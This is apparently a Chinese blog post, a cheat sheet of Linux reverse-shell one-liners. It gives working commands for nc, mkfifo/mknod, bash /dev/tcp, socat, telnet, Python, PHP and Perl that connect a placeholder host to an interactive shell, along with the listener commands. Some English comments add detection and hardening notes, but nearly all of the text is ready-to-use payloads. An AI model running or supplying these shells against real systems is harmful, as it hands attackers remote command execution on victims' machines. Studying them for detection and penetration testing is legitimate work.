Linux反弹shell常见命令


0x00 准备

# Start a listener on the attacker-side host: nc in listen mode (-l) on TCP port 12345 (-p),
# verbose output (-vv), numeric addresses only (-n).
nc -lvvnp 12345
# The two-connection telnet variant in section 0x04 connects to ports 12345 and 12346,
# so it needs two listeners.

0x01 nc反弹

  1. 当-e可用时（部分发行版自带的 nc，例如 OpenBSD 版 netcat，不提供 -e 选项，此时该命令无法使用）

    1. nc xxx.xxx.xxx.xxx 12345 -e /bin/bash
      
  2. mknod法（借助命名管道中转数据；会在当前目录留下名为 a 的管道文件，可作为排查痕迹）

    1. mknod a p;bash -i 0<a 2>&1 | nc xxx.xxx.xxx.xxx 12345 >a
      
  3. mkfifo法（与 mknod 法原理相同，同样会在当前目录留下名为 a 的管道文件）

    1. mkfifo a;bash -i 0<a 2>&1 | nc xxx.xxx.xxx.xxx 12345 >a
      

0x02 bash反弹

# Starts an interactive bash whose stdout and stderr go to a TCP connection opened through
# bash's /dev/tcp redirection; "0<&1" then points stdin at the same connection.
# Detection note: /dev/tcp/<host>/<port> is interpreted by bash itself, so it shows up in
# command-line and audit telemetry (e.g. execve logging), not as a file on disk.
bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/12345 0<&1

0x03 socat反弹

# Attacker-side host: listen on TCP port 12346 and bridge the connection to the local terminal ("-").
socat tcp-listen:12346 -
# Target side: connect out to the listener and run a login, interactive bash (bash -li) on a
# pseudo-terminal (pty), with stderr included and the shell placed in its own session (setsid).
# Detection note: a socat command line combining tcp-connect: with exec: and pty is a
# high-signal pattern in process-creation logs.
socat tcp-connect:xxx.xxx.xxx.xxx:12346 exec:"bash -li",pty,stderr,setsid,sigint,sane

0x04 telnet反弹

# mkfifo method: two alternative forms. Both create a FIFO named "a" in the current directory
# and use it to loop data between telnet and an interactive bash.
# Detection note: the leftover FIFO and a telnet process piped to/from a shell are both
# observable artifacts.
mkfifo a;bash -i 0<a 2>&1 | telnet xxx.xxx.xxx.xxx 12345 >a
mkfifo a;telnet xxx.xxx.xxx.xxx 12345 <a | /bin/bash -i >a 2>&1
# Second method: no FIFO. Input read from the connection to port 12345 is piped into bash,
# and bash's output is piped to a second telnet connection on port 12346.
telnet xxx.xxx.xxx.xxx 12345 | /bin/bash | telnet xxx.xxx.xxx.xxx 12346

0x05 python反弹

# Opens a TCP socket to the listener, duplicates the socket's descriptor onto fds 0, 1 and 2
# with os.dup2, then runs an interactive /bin/bash via subprocess.call so the shell inherits them.
# Detection note: the resulting shell has stdin, stdout and stderr all pointing at one socket,
# which is visible under /proc/<pid>/fd; "python3 -c" with socket and dup2 in the arguments
# is visible in command-line logging.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xxx.xxx.xxx.xxx",12345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

0x06 php反弹

# Opens a TCP connection with fsockopen, then uses exec() to start an interactive /bin/bash
# whose stdin, stdout and stderr are redirected to file descriptor 3.
# NOTE(review): $s is never passed to the shell; the redirections name descriptor 3 directly,
# so this relies on the socket having been assigned that descriptor number.
# Hardening note: listing exec and fsockopen in php.ini's disable_functions blocks this form
# in web-facing PHP.
php -r '$s=fsockopen("xxx.xxx.xxx.xxx",12345);exec("/bin/bash -i <&3 >&3 2>&3");'

0x07 perl反弹

# Creates a TCP socket S and connects it to $i:$p; only if the connect succeeds, reopens
# STDIN, STDOUT and STDERR as duplicates of S and replaces the perl process with "/bin/sh -i"
# (this section uses /bin/sh, not /bin/bash as in the others).
# Detection note: because of exec, the shell keeps the original PID, so process-tree views
# show a perl-launched PID running sh with socket-backed stdio.
perl -e 'use Socket;$i="xxx.xxx.xxx.xxx";$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
posted @ 2022-04-02 12:35  古明壁蚯